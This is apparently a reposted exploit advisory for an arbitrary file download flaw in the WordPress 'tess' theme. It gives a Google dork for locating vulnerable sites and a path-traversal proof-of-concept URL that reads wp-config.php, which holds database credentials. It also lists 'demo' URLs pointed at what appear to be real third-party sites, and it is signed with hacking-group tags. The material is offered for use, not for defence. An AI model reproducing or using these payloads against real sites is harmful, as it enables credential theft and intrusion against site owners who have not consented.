facebook facebook twitter rss

WordPress theme tess Arbitrary File Download Vulnerability

Author: Pro_Mast3r , Published: 02-11-2014
# WordPress theme tess  Arbitrary File Download Vulnerability .


# Author: Pro_Mast3r .


# Date: 10-09-2014 .


# Google Dork: /wp-content/themes/tess/ .


# Author E-mail : Pro.Mast3r@hotmail.com .


# Category: webapps .


# platform: php


# Vendor: tess
|Theme Name: TESS theme
|Theme URI: http://licornpublishing-preprod.com/tess/
|Description: Stanley WP Child Theme
|Author: Licorn Publishing
|Author URI: http://licornpublishing.com
|Template: stanleywp
|version: 1.0.0

#poc
http://127.0.0.1/wordpress/wp-content/themes/tess/download.php?file=../../../wp-config.php

# demo

http://tess-music.com/wp-content/themes/tess/download.php?file=../../../wp-config.php
http://licornpublishing-preprod.com/tess//wp-content/themes/tess/download.php?file=../../../wp-config.php
----
#exploit4arab
#IRAQ Cyber Army

Like us on Facebook :